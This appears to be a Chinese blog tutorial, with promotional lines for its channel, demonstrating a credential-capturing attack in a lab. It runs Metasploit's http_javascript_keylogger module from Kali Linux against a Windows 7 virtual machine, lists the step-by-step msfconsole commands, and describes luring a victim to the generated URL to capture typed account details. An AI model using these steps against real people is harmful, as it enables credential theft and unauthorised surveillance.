網絡安全工程師演示：原來***是這樣獲取你鍵盤的全部輸入信息的！

課前聲明：
一、本分享僅作學習交流，請自覺遵照法律法規！
二、搜索：Kali 與編程，學習更多網絡***乾貨！
三、Kali 與編程天天準時更新，敬請學習和關注！
正文部分
1、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫作The Metasploit Framework，簡稱叫作MSF。Metasploit做爲全球最受歡迎的工具，不單單是由於它的方便性和強大性，更重要的是它的框架。它容許使用者開發本身的漏洞腳本，從而進行測試。Metasploit(msf)究竟威力如何呢？如何利用***控制受害者主機呢？接下來讓咱們一塊兒學習！
2、資源裝備
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3、戰略安排
3.1 查看postgresql數據庫服務是否開啓，以下圖所示。
命令：service postgresql status

3.2 將postgresql數據庫服務設置爲開機自啓動，以下圖所示。
命令：update-rc.d postgresql enable

3.3 啓動Metasploit（msf）***測試框架，以下圖所示。
命令：msfconsole

步驟1：成功進入Metasploit***框架，以下圖所示。

步驟2：檢索對應的漏洞信息，以下圖所示。
命令：search keylogger

步驟3：利用相對應的漏洞利用模塊，以下圖所示。
命令：use auxiliary/server/capture/http_javascript_keylogger

步驟4：查看對應的***參數，以下圖所示。
命令：show options

步驟5：設置對應的參數，以下圖所示。
命令：set demo true

命令：set uripath /

3.4 運行漏洞利用模塊，以下圖所示。
命令：run

3.5 誘導受害者主機對生成的URL進行訪問，進入以下頁面，輸入對應的帳戶信息，以下圖所示。

3.6 在Kali Linux頁面實時監控受害者的實時輸入信息，以下圖所示，成功獲取受害者的帳戶信息。

小編一個個字敲打創做，可辛苦了，問君能否關注一下我呢？你還可搜索:Kali與編程，學習更多******技巧呢 ！拒絕盜版，轉載請聲明來源：Kali與編程
點我學習更多Kali Linux***測試與網絡***實戰技巧！